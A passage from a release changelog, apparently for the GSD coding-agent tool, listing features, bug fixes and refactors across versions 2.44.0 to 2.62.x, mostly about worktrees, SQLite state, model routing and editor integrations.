queries (#3515) + +### Fixed +- **gsd**: enrich vague diagnostic messages with root-cause context +- **test**: reset dedup cache between ask-user-freetext tests +- **db**: delete orphaned WAL/SHM files alongside empty gsd.db (#2478) +- **gsd**: prevent auto-wrapup from interrupting in-flight tool calls (#3512) +- **gsd**: handle bare model IDs in resolveDefaultSessionModel (#3517) +- **gsd**: wrap decision and requirement saves in transaction to prevent ID races +- **gsd**: prefer PREFERENCES.md over settings.json for session bootstrap model (#3517) +- **gsd**: add Claude Code official skill directories to skill resolution +- **dedup**: hash full question payload, not just IDs +- **gsd**: prevent duplicate ask_user_questions dispatches with per-turn dedup cache +- **pi-ai**: extend repairToolJson to handle XML tags and truncated numbers +- **pi-coding-agent**: cancel stale retries after model switch + +### Changed +- untrack .repowise/ and add to .gitignore + +## [2.62.1] - 2026-04-05 + +### Fixed +- **gsd**: gate steer worktree routing on active session, fix messaging +- **gsd**: resolve steer overrides to worktree path when worktree is active + +## [2.62.0] - 2026-04-04 + +### Added +- **gsd**: enhance /gsd codebase with preferences, --collapse-threshold, and auto-init +- **01-05**: fire before_model_select hook, add verbose scoring output, load capability overrides +- **01-04**: register before_model_select placeholder handler in GSD hooks +- **01-04**: add BeforeModelSelectEvent to extension API and wire emission +- **01-03**: wire taskMetadata from selectAndApplyModel to resolveModelForComplexity +- **01-03**: insert STEP 2 capability scoring into resolveModelForComplexity +- **01-01**: add taskMetadata to ClassificationResult and export extractTaskMetadata +- **01-01**: add capability types, data tables, and scoring functions to model-router + +### Fixed +- **gsd**: add codebase validation in validatePreferences so preferences are not silently dropped +- **test**: update db-path-worktree-symlink test for simplified diagnostic logging +- **gsd**: update tests for errors-only audit persistence, fix empty catch blocks +- **gsd**: harden audit log persistence — errors-only, sanitized, demote probe warnings +- **gsd**: address adversarial review findings on workflow-logger migration +- **gsd**: fail-closed stop guard, harden backtrack parsing, fix prompt params +- **gsd**: add diagnostic logging to empty catch blocks in auto-mode +- **lsp**: add legacy alias for renamed kotlin-language-server key +- break infinite notes loop when selecting "None of the above" +- align defaultRoutingConfig capability_routing to true +- **pi-coding-agent**: upgrade Kotlin LSP to official Kotlin/kotlin-lsp +- **test**: use correct RequirementCounts type fields in edge case tests +- **remote-questions**: fire configured channels in interactive mode + +### Changed +- **gsd**: migrate all catch blocks to centralized workflow-logger +- init gsd + +## [2.61.0] - 2026-04-04 + +### Added +- stop/backtrack capture classifications for milestone regression (#3488) +- GSD context optimization with model routing and context masking + +## [2.60.0] - 2026-04-04 + +### Added +- add /btw skill — ephemeral side questions from conversation context + +### Fixed +- **btw**: remove LLM-specific references from skill description + +## [2.59.0] - 2026-04-03 + +### Added +- **extensions**: add Ollama extension for first-class local LLM support (#3371) +- **doctor**: stale commit safety check with gsd snapshot and auto-cleanup +- **extensions**: wire up topological sort and unified registry filtering (#3152) +- **widget**: add last commit display and dashboard layout improvements (#3226) +- **model-routing**: enable dynamic routing by default (#3120) +- **vscode**: sidebar redesign, SCM provider, checkpoints, diagnostics [3/3] +- **splash**: add remote channel indicator to welcome screen tools row +- stream full text and thinking output in headless verbose mode (#2934) +- **gsd**: add codebase map — structural orientation for fresh agent contexts + +### Fixed +- **worktree**: resolve merge conflict for PR #3322 — adopt comprehensive pre-merge cleanup +- **merge**: clean stale MERGE_HEAD before squash merge (#2912) +- **state**: always run disk→DB reconciliation when DB is available (#2631) +- **git-service**: fix merge-base ancestry check and .gsd/ leakage in snapshot absorption +- **extensions**: update provides.hooks in 7 extension manifests to match actual registrations (#3157) +- surface nativeCommit errors in reconcileMergeState instead of silently swallowing (#3052) +- **parallel**: scope commits to milestone boundaries in parallel mode (#3047) +- add windowsHide to all web-mode subprocess spawns (#2628) (#3046) +- skip auto-mode pause on empty-content aborted messages (#2695) (#3045) +- detect and remove nested .git dirs in worktree cleanup to prevent data loss (#3044) +- prevent data loss when git isolation default changes (#2625) (#3043) +- **read-tool**: clamp offset to file bounds instead of throwing (#3007) (#3042) +- **gsd**: preserve queued milestones with worktrees in ghost detection (#3041) +- **compaction**: add chunked fallback when messages exceed model context window (#3038) +- preserve interactive terminal across tab switches and project changes (#3055) +- call cleanupQuickBranch on turn_end to squash-merge quick branch back (#3054) +- align run-uat artifact path to ASSESSMENT, preventing false stuck retries (#3053) +- replace invalid Discord invite links with canonical URL (#3056) +- add Windows shell guard to remaining spawn sites (#3058) +- route `gsd auto` to headless runner to prevent hang on piped stdin/stdout (#3057) +- respect .gitignore for .gsd/ in rethink prompt (#3059) +- migrate unit ownership from JSON to SQLite to eliminate read-modify-write race (#3061) +- **roadmap**: handle numbered, bracketed, and indented prose H3 headers in slice parser (#3063) +- add worktree-merge to resolveModelWithFallbacksForUnit switch and update KNOWN_UNIT_TYPES (#3066) +- clean up MERGE_HEAD on all error paths in mergeMilestoneToMain (#2912) (#3068) +- prevent LLM from confusing background task output with user input (#3069) +- add openai-codex provider and modern OpenAI models to MODEL_CAPABILITY_TIER and cost tables (#3070) +- preserve active tab when switching projects (#3071) +- include project name in desktop notifications (#3072) +- recover from many-image dimension overflow by stripping older images (#3075) +- resolve bare model IDs to anthropic over claude-code provider (#3076) +- **auto**: move selectAndApplyModel before updateProgressWidget (#3079) +- detect project relocation and recover state without data loss (#3080) +- add free-text input to ask-user-questions when "None of the above" is selected (#3081) +- block work execution during /gsd queue mode (#2545) (#3082) +- detect worktree basePath in gsdRoot() to prevent escaping to project root (#3083) +- invalidate stale quick-task captures across milestone boundaries (#3084) +- defer model validation until after extensions register (#3089) +- repair YAML bullet lists in malformed tool-call JSON (#3090) +- unify SUMMARY.md render paths for projection fidelity (#3091) +- chat mode misrepresents terminal output, looks stuck, omits user messages (#3092) +- resolve 4 state corruption bugs in milestone/slice completion (#2945) (#3093) +- isolate guided-flow session state and key discussion milestone queries (#2985) (#3094) +- **guided-flow**: route dispatchWorkflow through dynamic routing pipeline (#3153) +- skip external state migration inside git worktrees (#2970) (#3227) +- coerce non-numeric strings in DB columns during manifest serialization (#2962) (#3229) +- route allDiscussed and zero-slices paths to queued milestone discussion (#3150) (#3230) +- use loose equality for null checks in secure_env_collect (#2997) (#3231) +- prevent prompt explosion from $' in template replacement values (#2968) (#3232) +- resolve OAuth API key in buildMemoryLLMCall via modelRegistry (#2959) (#3233) +- **forensics**: read completion status from DB instead of legacy file (#3129) (#3234) +- use camelCase parameter names in execute-task and complete-slice prompts (#2933) (#3236) +- check bootstrap completeness in init wizard gate, not just .gsd/ existence (#2942) (#3237) +- specify write tool for PROJECT.md in milestone/slice prompts (#3238) +- widen completing-milestone gate to accept "None required" and similar phrasings (#2931) (#3239) +- prevent ask_user_questions from poisoning auto-mode dispatch (#2936) (#3240) +- guard null s.currentUnit in runUnitPhase closeout after stopAuto race (#2939) (#3241) +- replace `web_search` with `search-the-web` in prompts and agent frontmatter (#2920) (#3245) +- preserve milestone title in upsertMilestonePlanning when DB row pre-exists (#2879) (#3247) +- invalidate stale milestone validation on roadmap reassessment (#2957) (#3242) +- **discuss**: add roadmap fallback when DB is open but empty (#2892) (#3244) +- integrate Codex & Gemini CLI into provider routes and rate-limit handling (#2922) (#3246) +- **error-classifier**: widen STREAM_RE to cover all 7 V8 JSON parse error variants (#2916) (#3243) +- prevent git stash from destroying queued milestone CONTEXT files (#2505) (#3273) +- skip staleness rebuild in npm tarball installs (#2877) (#3250) +- **parallel**: check worktree DB for milestone completion in merge (#2812) (#3256) +- make claude-code provider stateful with full context and sidechain events (#2859) (#3254) +- **worktree**: preserve non-empty gsd.db during sync to prevent truncation (#2815) (#3255) +- align @gsd/native module type with compiled output (#3253) +- parse hook/* completed-unit keys correctly in forensics + doctor (#2826) (#3252) +- copy mcp.json into auto-mode worktrees (#2791) (#3251) +- add gsd_requirement_save and upsert path for requirement updates (#3249) +- handle pause_turn stop reason to prevent 400 errors with native web search (#2869) (#3248) +- use authoritative milestone status in web roadmap (#2807) (#3258) +- classify long-context entitlement 429 as quota_exhausted, not rate_limit (#2803) (#3257) +- **docs**: use ~/.pi/agent/extensions/ for community extension install path (#3131) (#3259) +- add disk→DB slice reconciliation in deriveStateFromDb (#2533) (#3262) +- run forensics duplicate detection before investigation (#2704) (#3260) +- skip TUI render loop on non-TTY stdout to prevent CPU burn (#3095) (#3263) +- persist forensics report context across follow-up turns (#2941) (#3261) +- invalidate workspace state on turn_end so milestones list stays current (#2706) (#3266) +- eliminate 3 recurring doctor audit false positives (#3105) (#3264) +- **web**: reconcile auto-mode state with on-disk lock in dashboard (#2705) (#3265) +- treat ghost milestones as ineligible for parallel execution (#2501) (#3268) +- redirect auto-mode to headless when stdout is piped (#2732) (#3269) +- attempt VACUUM recovery when initSchema fails with corrupt freelist (#2519) (#3270) +- resolve db_unavailable loop in worktree/symlink layouts (#2517) (#3271) +- correct OAuth fallback request shape for google_search (#2963) (#3272) +- prevent UAT stuck-loop and orphaned worktree after milestone completion (#3065) +- **mcp**: handle server names with spaces in mcp_discover (#3037) +- **gsd**: detect markdown body verdicts and guard plan-milestone against completed slices (#2960) (#3035) +- **error-classifier**: replace STREAM_RE whack-a-mole with catch-all V8 JSON.parse pattern +- type _borderColorKey as 'dim' | 'bashMode' to match ThemeColor +- **tui**: comprehensive TUI review — layout, flow, rendering, and state fixes +- **gsd**: harden codebase-map — bug fixes, UX polish, and expanded tests + +### Changed +- **state**: centralize pipeline logging through workflow logger (#3282) +- **gitignore**: exclude src/ build artifacts, scratch files, and .plans/ +- **complexity**: reclassify planning phases from standard to heavy tier + +## [2.58.0] - 2026-03-28 + +### Added +- Added 6 discord.js shard/error/warn event listeners for reconnect… + +### Fixed +- **auto**: guard startAuto() against concurrent invocation (#2923) +- **auto-dispatch**: widen operational verification gate regex (fixes #2866) (#2898) +- **parallel**: three bugs preventing reliable parallel worker execution (#2801) +- **web**: fall back to project totals when dashboard metrics are zero (#2847) +- **gsd**: parse raw YAML under preference headings (#2794) +- **gsd**: persist verification classes in milestone validation (#2820) +- **gsd**: guard reconcileWorktreeDb against same-file ATTACH corruption (#2825) +- **web**: skip shutdown in daemon mode so server survives tab close (#2842) +- **headless**: skip execution_complete for multi-turn commands (auto/next) +- Fixed 3 bugs (launchd JSON parsing, login race condition, interact… + +## [2.57.0] - 2026-03-28 + +### Added +- Extended DaemonConfig with control_channel_id and orchestrator se… +- Created pure-function event formatters (10 functions) mapping RPC… +- **models**: add GLM-5.1 to Z.AI provider in custom models +- Added discord.js v14, DiscordBot class with auth guard and lifecy… +- Created packages/daemon workspace package with DaemonConfig/LogLe… +- headless text mode shows tool calls + skip UAT pause in headless +- Wire --resume flag to resolve session IDs via prefix matching and… +- Migrated headless orchestrator to use execution_complete events,… + +### Fixed +- **headless**: match "completed" status from RPC v2 in exit code mapper +- show external drives in directory browser on Linux +- Regenerate package-lock.json after merge +- **gsd**: resume cold auto bootstrap from db +- **gsd**: preserve first auto unit model after session reset +- Accept flags after positional command in headless arg parser +- **gsd**: discover project subagents in .gsd +- **model-routing**: use honest unitTypes for discuss dispatches and map all auto-dispatch phases +- revert jsonl.ts to inline implementation — @gsd-build/rpc-client not available at source-level test time in CI + +### Changed +- auto-commit after complete-milestone + +## [2.56.0] - 2026-03-27 + +### Added +- **parallel**: /gsd parallel watch — native TUI overlay for worker monitoring (#2806) + +### Fixed +- **ci**: copy web/components to dist-test for xterm-theme test (#2891) +- **gsd**: prefer PREFERENCES.md in worktrees (#2796) +- **gsd**: resume auto-mode after transient provider pause (#2822) +- **parallel**: resolve session lock contention and 3 related parallel-mode bugs (#2184) (#2800) +- **web**: improve light theme terminal contrast (#2819) +- **gsd**: preserve auto start model through discuss (#2837) + +### Changed +- **test**: compile unit tests with esbuild, reclassify integration tests, fix node_modules symlink (#2809) + +## [2.55.0] - 2026-03-27 + +### Added +- colorized headless verbose output with thinking, phases, cost, and durations (#2886) +- headless text mode observability + skip UAT pause (#2867) + +### Fixed +- **cli**: let gsd update bypass version mismatch gate (#2845) +- **contracts**: add isWorkspaceEvent guard + close routeLiveInteractionEvent exhaustiveness gap (#2878) +- **gsd**: use project root for prior-slice dispatch guard (#2863) +- **gsd**: include queue context in milestone planning prompts (#2846) +- detect monorepo roots in project discovery to prevent workspace fragmentation (#2849) +- **bg-shell**: recover from deleted cwd in timers (#2850) +- **gsd**: enable dynamic routing without models section (#2851) +- **interactive**: fully remove providers from /providers (#2852) + +## [2.54.0] - 2026-03-27 + +### Added +- Headless Integration Hardening & Release (M002) (#2811) +- **parallel**: add real-time TUI monitor dashboard with self-healing (#2799) + +## [2.53.0] - 2026-03-27 + +### Added +- **vscode**: activity feed, workflow controls, session forking, enhanced code lens [2/3] (#2656) +- **gsd**: enable safety mechanisms by default (snapshots, pre-merge checks) (#2678) + +### Fixed +- hydrate collected secrets for current session (#2788) +- resolve stash pop conflicts and stop swallowing merge errors (#2780) +- treat any extracted verdict as terminal in isValidationTerminal (#2774) +- use localStorage for auth token to enable multi-tab usage (#2785) +- guard activeMilestone.id access in discuss and headless paths (#2776) +- clean up zombie parallel workers stuck in error state (#2782) +- relax milestone validation gate to accept prose evidence (#2779) +- write milestone reports to project root instead of worktree (#2778) +- auto-resolve build artifact conflicts in milestone merge (#2777) +- let rate-limit errors attempt model fallback before pausing (#2775) +- prevent gsd next from self-killing via stale crash lock (#2784) +- add shell flag for Windows spawn in VSCode extension (#2781) + +### Changed +- **gsd**: extract duplicated status guards and validation helpers (#2767) + +## [2.52.0] - 2026-03-27 + +### Added +- **vscode**: status bar, file decorations, bash terminal, session tree, conversation history, code lens [1/2] (#2651) +- **web**: Dark mode contrast — raise token floor and flatten opacity tier system (#2734) +- Wire --bare mode across headless → pi-coding-agent → resource-loa… +- Added runId generation on prompt/steer/follow_up commands, event… +- Added RPC protocol v2 types, init handshake with version detectio… + +### Fixed +- auto-mode stops after provider errors (#2762) (#2764) +- add missing runtime stage name to Dockerfile (#2765) +- make transaction() re-entrant and add slice_dependencies to initSchema +- remove preferences.md from ROOT_STATE_FILES to prevent back-sync overwrite +- wire tool handlers through DB port layer, remove _getAdapter from all tools +- **gsd**: move state machine guards inside transaction in 5 tool handlers (#2752) +- reconcile disk milestones into empty DB before deriveStateFromDb guard (#2686) +- **gsd**: seed preferences.md into auto-mode worktrees (#2693) +- **claude-import**: discover marketplace plugins nested inside container directories (#2718) +- exempt interactive tools from idle watchdog stall detection (#2676) +- guard allSlicesDone against vacuous truth on empty slice array (#2679) +- block complete-milestone dispatch when VALIDATION is needs-remediation (#2682) +- **gsd**: sync milestone DB status in parkMilestone and unparkMilestone (#2696) +- **web**: auth token gate — synthetic 401 on missing token, unauthenticated boot state, and recovery screen (#2740) +- **remote-questions**: empty-key entry in auth.json shadows valid Discord bot token (#2737) +- idle watchdog stalled-tool detection overridden by filesystem activity (#2697) +- surface exhausted Claude SDK streams as errors (#2719) +- **docker**: overhaul fragile setup, adopt proven container patterns (#2716) +- **gsd**: write DB before disk in validate-milestone to match engine pattern (#2742) +- **gsd**: extract and honor milestone argument in /gsd auto and /gsd next (#2729) +- **windows**: prevent EINVAL by disabling detached process groups on Win32 (#2744) +- **gsd**: delete orphaned verification_evidence rows on complete-task rollback (#2746) +- **gsd**: wire setLogBasePath into engine init to resurrect audit log (#2745) +- Remove premature pendingTools.delete in webSearchResult handler (#2743) +- **gsd**: remove redundant assertions that fail TS2367 typecheck +- include preferences.md in worktree sync and initial seed + +### Changed +- **pi-ai**: replace model-ID pattern matching with capability metadata (#2548) +- **gsd-db**: comprehensive SQLite audit fixes — indexes, caching, safety, reconciliation +- rename preferences.md to PREFERENCES.md for consistency (#2700) (#2738) +- **gsd**: unify three overlapping error classifiers into single classify→decide→act pipeline + +## [2.51.0] - 2026-03-26 + +### Added +- add /terminal slash command for direct shell execution (#2349) +- **auto**: check verification class compliance before milestone completion (#2623) +- **validate**: extract followUps and knownLimitations in parseSummary (#2622) +- managed RTK integration with opt-in preference and web UI toggle (#2620) +- **validate**: inject verification classes into milestone validation prompt (#2621) +- **skills**: add 19 wshobson/agents packs with 40 curated skills +- **skills**: add 11 new skill packs covering major frameworks and languages +- **skills**: add SQLite/SQL detection, SQL optimization pack, and Redis pack +- **skills**: add Prisma and Supabase/Postgres database packs +- **skills**: add cloud platform packs (Firebase, Azure, AWS) and improve detection +- **skills**: curate catalog — add top ecosystem skills, drop low-quality bundled ones +- **skills**: parse SDKROOT from pbxproj for platform-aware iOS skill matching +- **skills**: use ~/.agents/skills/ as primary skills directory with curated catalog + +### Fixed +- improve light theme warning contrast (#2674) +- honor explicit model config when model is not in known tier map (#2643) +- exclude lastReasoning from retry diagnostic to prevent hallucination loops (#2663) +- persist rewrite-docs attempt counter to disk for session restart survival (#2671) +- add non-null assertions for parseUnitId optional fields in tests +- update triage-dispatch static analysis tests for enqueueSidecar helper +- **notifications**: prefer terminal-notifier over osascript on macOS (#2633) +- classify stream-truncation JSON parse errors as transient (#2636) +- call ensureDbOpen() before slice queries in /gsd discuss (#2640) +- **prompts**: use --body-file for forensics issue creation (#2641) +- isLockProcessAlive should return true for own PID (#2642) +- check ASSESSMENT file for UAT verdict in checkNeedsRunUat (#2646) +- use pauseAuto instead of stopAuto for warning-level dispatch stops (#2666) +- signal malformed tool arguments in toolcall_end event (#2647) +- prevent double mergeAndExit on milestone completion (#2648) +- respect queue-order.json in DB-backed state derivation (#2649) +- **vscode**: support Remote SSH by adding extensionKind and error handler (#2650) +- update DB task status in writeBlockerPlaceholder for execute-task (#2657) +- normalize path separators in matchesProjectFileMarker for Windows +- **tests**: remove obsolete doctor filesystem test +- **tests**: update doctor issue code to db_done_task_no_summary +- restore PR files lost during merge conflict resolution +- **skills**: address QA round 3 +- **skills**: address QA round 2 +- **skills**: address QA round 1 +- **skills**: prioritize ecosystem dir and skip legacy after migration +- **skills**: address QA round 23 +- **skills**: address QA round 22 +- **skills**: address QA round 21 +- **skills**: address QA round 20 +- **skills**: address QA round 19 +- **skills**: address QA round 18 +- **skills**: address QA round 17 +- **skills**: address QA round 16 +- **skills**: address QA round 15 +- **skills**: address QA round 14 +- **skills**: address QA round 13 +- **skills**: address QA round 12 +- **skills**: address QA round 11 +- **skills**: address QA round 10 +- **skills**: address QA round 8 +- **skills**: detect FastAPI via dependency scanning +- **skills**: address QA round 6 +- **skills**: address QA round 5 +- **skills**: address QA round 4 +- **skills**: address QA round 3 +- **skills**: address QA round 2 +- **skills**: defer greenfield skill selection to post-design phase +- **skills**: add migration from ~/.gsd/agent/skills/ to ~/.agents/skills/ +- **gsd extension**: detect initialized projects in health widget +- **gsd extension**: detect initialized projects in health widget + +### Changed +- consolidate docs, remove stale artifacts, and repo hygiene (#2665) +- extract runSafely helper for try-catch-debug-continue pattern (#2611) + +## [2.50.0] - 2026-03-26 + +### Added +- **gsd**: wire structured error propagation through UnitResult +- add parallel quality gate evaluation with evaluating-gates phase +- add 8-question quality gates to planning and completion templates + +### Fixed +- reconcile stale task status in filesystem-based state derivation (#2514) +- merge duplicate extractUatType imports in auto-dispatch +- use Record for hasNonEmptyFields to accept typed DB rows +- **tests**: replace undefined assertTrue/assertEq with assert.ok/assert.equal +- **tests**: replace undefined assertTrue/assertEq with assert.ok/deepStrictEqual +- **gsd**: handle session_switch event so /resume restores GSD state (#2587) +- use GitHub Issue Types via GraphQL instead of classification labels +- **headless**: disable overall timeout for auto-mode, fix lock-guard auto-select (#2586) +- **auto**: align UAT artifact suffix with gsd_slice_complete output (#2592) +- **retry-handler**: stop treating 5xx server errors as credential-level failures +- **test**: replace stale completedUnits with sessionFile in session-lock test +- **session-lock**: retry lock file reads before declaring compromise +- **gsd**: prevent ensureGsdSymlink from creating subdirectory .gsd when git-root .gsd exists +- **auto**: add EAGAIN to INFRA_ERROR_CODES to stop budget-burning retries +- **search**: enforce hard search budget and survive context compaction +- **remote-questions**: use static ESM import for AuthStorage hydration +- add SAFE_SKILL_NAME guard to reject prompt-injection via crafted skill names +- **gsd**: use explicit parameter syntax in skill activation prompts +- guard writeIntegrationBranch against workflow-template branches +- preserve doctor missing-dir checks for active legacy slices +- **gsd**: downgrade isolation mode when worktree creation fails +- **gsd**: skip loading files for completed milestones in queue context builder +- resolve race conditions in blob-store, discovery-cache, and agent-loop +- **ai**: resolve WebSocket listener leaks and bound session cache +- **rpc**: resolve double-set race, missing error ID, and stream handler +- **pi-coding-agent**: prevent crash when login is cancelled +- **doctor**: compare lockfile mtime against install marker, not directory mtime (#1974) +- **doctor**: chdir out of orphaned worktree before removal (#1946) +- **roadmap**: recognize '## Slice Roadmap' header in extractSlicesSection +- prevent worktree sync from overwriting state and forward-sync completed-units.json +- **web**: lazily compute default package root to avoid Windows standalone crash + +### Changed +- adopt parseUnitId utility across all auto-* modules +- flatten syncMilestoneDir nesting with shared helper +- extract merge-state cleanup helper in reconcileMergeState +- extract planning-state validation helpers in detectRogueFileWrites +- split doctor-checks into focused modules +- merge auto-worktree-sync into auto-worktree +- deduplicate artifact path functions into single module +- remove dead selfHealRuntimeRecords function from auto-recovery +- decouple session-forensics from auto-worktree +- remove dead worktree code and unused methods +- consolidate branch name patterns into single module +- deduplicate session-lock compromise handler and state assignment + +## [2.49.0] - 2026-03-25 + +### Added +- add --yolo flag to /gsd auto for non-interactive project init + +### Fixed +- use full git log in merge tests to match trailer-based milestone IDs +- update parallel-merge test assertion for new trailer format +- clarify regex alternation in test assertion +- verdict gate accepts PARTIAL for mixed/human-experience/live-runtime UATs + +### Changed +- move GSD metadata from commit subject scopes to git trailers + +## [2.48.0] - 2026-03-25 + +### Added +- **discuss**: allow /gsd discuss to target queued milestones +- enhance /gsd forensics with journal and activity log awareness + +### Fixed +- make journal scanning intelligent — limit parsed files, line-count older ones +- **model-registry**: scope custom provider stream handlers to prevent clobbering built-in API handlers +- **forensics**: filter benign bash exit-code-1 and user skips from error traces +- **gsd**: clear stale milestone ID reservations at session start +- render tool calls above text response for external providers +- **auto**: skip CONTEXT-DRAFT warning for completed/parked milestones + +### Changed +- address review - extract RAPID_ITERATION_THRESHOLD_MS, simplify data access + +### Removed +- remove insertChildBefore usage in chat-controller + +## [2.47.0] - 2026-03-25 + +### Added +- **agent-core**: add externalToolExecution mode for external providers +- **provider**: add Claude Code CLI provider extension + +### Fixed +- **claude-code-cli**: render tool calls above text response +- **ci**: update FILE-SYSTEM-MAP.md path after docs→docs-internal move +- isInheritedRepo false negative when parent has stale .gsd; defense-in-depth local .git check in bootstrap +- **claude-code-cli**: resolve SDK executable path and update model IDs +- make planning doctrine demoable definition audience-appropriate +- **prompts**: migrate remaining 4 prompts to use DB-backed tool API instead of direct write +- make workflow event hash platform-deterministic +- reconcile stale task DB status from disk artifacts (#2514) + +## [2.46.1] - 2026-03-25 + +### Fixed +- **ci**: prevent windows-portability from blocking pipeline +- **ci**: prevent pipeline race condition on release push +- **gsd**: create empty DB for fresh projects with empty .gsd/ (#2510) +- **remote-questions**: hydrate remote channel tokens from auth.json on startup + +### Changed +- trigger CI to pick up pipeline race condition fix +- trigger pipeline with race condition fix + +## [2.46.0] - 2026-03-25 + +### Added +- **gsd**: single-writer engine v3 — state machine guards, actor identity, reversibility +- **gsd**: single-writer state engine v2 — discipline layer on DB architecture +- **gsd**: add workflow-logger and wire into engine, tool, manifest, reconcile paths (#2494) + +### Fixed +- **gsd**: align prompts with single-writer tool API +- **gsd**: integration-proof — check DB state not roadmap projection after reset +- **gsd**: block milestone completion when verification fails (#2500) +- **ci**: add typecheck:extensions to pretest to prevent silent type drift +- **gsd**: relax integration-proof cross-validation for table-format roadmap +- **gsd**: update integration-proof tests for table-format roadmap projections +- **gsd**: update test assertions for schema v11, prompt changes, and removed completedUnits +- **gsd**: update test files for removed completedUnits, writeLock signature, and type changes +- **gsd**: remove stale completedUnits refs, fix writeLock callers, add missing imports +- **gsd**: harden single-writer engine — close TOCTOU, intercept bypasses, status inconsistencies +- **write-intercept**: close bare-relative-path bypass in STATE.md regex +- **voice**: fix misleading portaudio error on PEP 668 Linux systems (#2403) (#2407) +- **core**: address PR review feedback for non-apikey provider support (#2452) +- **ci**: retry npm install in pipeline to handle registry propagation delay (#2462) +- **gsd**: change default isolation mode from worktree to none (#2481) +- **loader**: add startup checks for Node version and git availability (#2463) +- **gsd**: add worktree lifecycle events to journal (#2486) + +## [2.45.0] - 2026-03-25 + +### Added +- **web**: make web UI mobile responsive (#2354) +- **gsd**: add `/gsd rethink` command for conversational project reorganization (#2459) +- **gsd**: add renderCall/renderResult previews to DB tools (#2273) +- add timestamps on user and assistant messages (#2368) +- **gsd**: add `/gsd mcp` command for MCP server status and connectivity (#2362) +- complete offline mode support (#2429) +- **system-context**: inject global ~/.gsd/agent/KNOWLEDGE.md into system prompt (#2331) + +### Fixed +- **gsd**: handle retentionDays=0 on Windows + run windows-portability on PRs (#2460) +- use Array.from instead of Buffer.from for native processStreamChunk state (#2348) +- **gsd**: isInheritedRepo conflates ~/.gsd with project .gsd when git root is $HOME (#2398) +- reconcile disk milestones missing from DB in deriveStateFromDb (#2416) (#2422) +- **auto**: reset recoveryAttempts on unit re-dispatch (#2322) (#2424) +- detect and preserve submodule state during worktree teardown (#2337) (#2425) +- **auto-start**: handle survivor branch recovery in phase=complete (#2358) (#2427) +- **gsd**: widen test search window for CRLF portability on Windows (#2458) +- **gsd**: preserve rich task plans on DB roundtrip (#2450) (#2453) +- merge worktree back to main when stopAuto is called after milestone completion (#2317) (#2430) +- **gsd**: skip doctor directory checks for pending slices (#2446) +- **gsd**: migrate completion/validation prompts to DB-backed tools (#2449) +- **gsd**: prevent saveArtifactToDb from overwriting larger files with truncated content (#2442) (#2447) +- stop auto loop on real code merge conflicts (#2330) (#2428) +- classify terminated/connection errors as transient in provider error handler (#2309) (#2432) +- archive completed-units.json on milestone transition and sync metrics.json (#2313) (#2431) +- supervision timeouts now respect task est: annotations (#2243) (#2434) +- auto_pr: true now actually creates PRs — fix 3 interacting bugs (#2302) (#2433) +- **gsd**: insert DB row when generating milestone ID (#2416) +- **gsd**: reconcile disk-only milestones into DB in deriveStateFromDb (#2416) +- **preferences**: deduplicate unrecognized format warning on repeated loads (#2375) +- gate auto-mode bootstrap on SQLite availability (#2419) (#2421) +- block /gsd quick when auto-mode is active (#2420) +- **ci**: add Rust target for all platforms, not just cross-compilation +- **ci**: restore Rust target triple and separate cross-compilation setup +- **ci**: separate cross-compilation target from toolchain install + +### Changed +- migrate D-G test files from createTestContext to node:test (#2418) +- **test**: replace try/finally with beforeEach/afterEach in packages tests (#2390) +- **test**: migrate gsd/tests s-z from custom harness to node:test (#2397) +- **test**: migrate gsd/tests o-r from custom harness to node:test (#2401) +- **test**: migrate gsd/tests i-n from custom harness to node:test (#2399) +- **test**: migrate gsd/tests a-c from custom harness to node:test (#2400) +- **test**: replace try/finally with t.after() in gsd/tests (e-i) (#2396) +- **test**: replace try/finally with t.after() in gsd/tests (a-d) (#2395) +- **test**: replace try/finally with t.after() in src/tests (o-z) (#2392) +- **test**: replace try/finally with t.after() in src/tests (a-n) (#2394) + +## [2.44.0] - 2026-03-24 + +### Added +- **core**: support for 'non-api-key' provider extensions like Claude Code CLI (#2382) +- **docker**: add official Docker sandbox template for isolated GSD auto mode (#2360) +- **gsd**: show per-prompt token cost in footer behind show_token_cost preference (#2357) +- **web**: add "Change project root" button to web UI (#2355) +- **gsd**: Tool-driven write-side state transitions — replace markdown mutation with atomic SQLite tool calls (#2141) +- **S06/T02**: Strip all 16 lazy createRequire fallback paths from migr… +- **S05/T04**: Migrate remaining 6 callers (auto-prompts, auto-recovery… +- **S05/T03**: Migrate 7 warm/cold callers (doctor, doctor-checks, visu… +- **S05/T02**: Extend migrateHierarchyToDb to populate v8 planning colu… +- **S05/T01**: Schema v10 adds replan_triggered_at column; deriveStateF… +- **S04/T03**: Migrate auto-dispatch.ts (3 rules), auto-verification.ts… +- **S04/T02**: Migrate dispatch-guard.ts to DB queries with isDbAvailab… +- **S01/T03**: Migrate planning prompts to DB-backed tool guidance and… +- **S01/T01**: Partially advanced schema v8 groundwork and documented t… +- **gsd**: tool-driven write-side state transitions (M001) + +### Fixed +- post-migration cleanup — pragmas, rollbacks, tool gaps, stale code (#2410) +- **test**: normalize CRLF in auto-stash-merge assertion for Windows +- **test**: swallow EPERM on Windows temp dir cleanup in auto-stash-merge test +- **gsd**: add file-based fallbacks for DB-dependent code paths and fix CI test failures +- **gsd**: remove stale observabilityIssues reference in journal-integration test +- **extensions**: detect TypeScript syntax in .js extension files and suggest renaming to .ts (#2386) +- **gsd**: prevent planning data loss from destructive upsert and post-unit re-import (#2370) +- **gsd**: use correct notify severity type ("warning" not "warn") +- **web**: resolve compiled .js modules for all subprocess calls under node_modules (#2320) +- **test**: increase perf assertion threshold to prevent CI flake (#2327) +- add missing SQLite WAL sidecars and journal to runtime exclusion lists (#2299) +- **gsd**: remove stale observability validator + fix greenfield worktree check +- **memory**: fix memory and resource leaks across TUI, LSP, DB, and automation (#2314) +- **gsd**: preserve freeform DECISIONS.md content on decision save (#2319) +- **pi-ai**: restore alibaba-coding-plan provider via models.custom.ts (#2350) +- **doctor**: skip false env_dependencies error in auto-worktrees (#2318) +- **gsd**: auto-stash dirty files before squash merge and surface dirty filenames in error (#2298) +- **gsd**: keep params as any in db-tools executors (CI tsconfig is stricter) +- **gsd**: replace any types in db-tools executor signatures +- **gsd**: resolve 4 TS compilation errors from parser migration +- **gsd**: wrap plan-task DB writes in transaction + untrack .gsd/ artifacts +- **S04/T04**: Add planning-crossval tests proving DB↔rendered↔parsed pa… +- **S04/T01**: Add schema v9 migration with sequence column on slices/ta… +- remove .gsd/ milestone artifacts from git index +- **tests**: update remediation step assertions and crossval fixture +- **gsd**: address all 7 review findings from PR #2141 +- **tests**: remove invalid `seq` property from insertMilestone calls + +### Changed +- **contrib**: add CODEOWNERS and team workflow docs (#2286) 